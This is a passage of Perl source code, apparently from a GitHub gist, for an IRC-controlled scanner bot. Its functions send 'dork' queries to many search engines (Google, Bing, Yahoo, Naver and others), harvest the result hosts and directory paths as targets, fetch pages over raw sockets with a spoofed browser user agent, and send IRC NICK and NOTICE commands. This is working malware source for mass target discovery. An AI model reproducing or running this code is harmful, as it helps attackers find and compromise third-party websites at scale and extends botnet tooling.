my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=1) {
my $Witch =
("http://www.witch.de/search-result.php?searchtype=phonetisch&amp;search=".key($key)."&cn=".$b);
my $Res = query($Witch);
while ( $Res =~ m/<a href=\"http:\/\/(.+?)\//g ) {
my $k = $1;
if ( $k !~ Witch ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub google2() {
my @lst;
my $key = $_[0];
my $b = 0;
my @dom =
("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
"ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
"com.tr","com.tw","com.ua","co.uk","hu");
for ($b=50; $b<=5000; $b+=500) {
my $Domains = $dom[rand(scalar(@dom))];
my $google2 =
("http://www.google.".$Domains."/search?num=100&hl=en&q=".key($key)."&start=".$b."&sa=N");
my $Res = query($google2);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
my $k = $1;
if ( $k !~ google ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $bing =
("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE");
my $Res = query($bing);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){
my
$AlT=("http://it.altavista.com/web/results?itag=ody&amp;kgs=0&amp;kls=0&amp;dis=1&amp;q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while ($Res=~m/<span class=ngrn>(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub ask() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=10) {
my $Ask =
("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
my $Res = query($Ask);
while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
if ($1 !~ /ask.com/){
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub yahoo() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=1) {
my $yahoo =
("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $Res = query($yahoo);
while ($Res =~ m/26u=(.*?)%26w=/g) {
if ($1 !~ /yahoo/){
my $k = $1;
my @grep = links($k);
push(@lst, @grep);
}
}
}
return @lst;
}
sub sapo(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=1){#
http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=20&amp;location=pt&amp;page=2&amp;q=by%20pmachine&amp;st=local
my
$Lyc=("http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=10&amp;location=pt&amp;page=".$b."&q=".key($key)."&st=local");
my $Res=query($Lyc);
while($Res =~ m/<a href=\"?http:\/\/(.+?)\//g){
if ($1 !~ /pesquisa|sapo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
#
http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=10&amp;location=pt&amp;page=2&amp;q=pmachine&amp;st=local
sub virgillio(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=10){#
http://ricerca.virgilio.it/ricerca?qs=pmachine&amp;filter=1&amp;site=&amp;lr=&amp;hits=10&amp;offset=10
my
$Lyc=("http://ricerca.virgilio.it/ricerca?qs=".key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
my $Res=query($Lyc);
while($Res =~ m/<a href=\"?http:\/\/(.+?)\//g){
if ($1 !~ /VIRGILLIO|Ricerca/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
#
http://ricerca.virgilio.it/ricerca?qs=pmachine&amp;filter=1&amp;site=&amp;lr=&amp;hits=10&amp;offset=10
sub naver(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my
$Lyc=("http://web.search.naver.com/search.naver?where=webkr&amp;query=".key($key)."&xc=&docid=0&qt=df&lang=all&f=&r=&st=s&fd=2&start=".$b);
my $Res=query($Lyc);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
if ($1 !~ /usca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}
sub key(){
my $dork=$_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
$dork =~ s/@/\%40/g;
return $dork;
}
sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr =>
"$host", PeerPort => "80", Proto => "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost:
$host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}
sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
}
return @calculate;
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
--
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment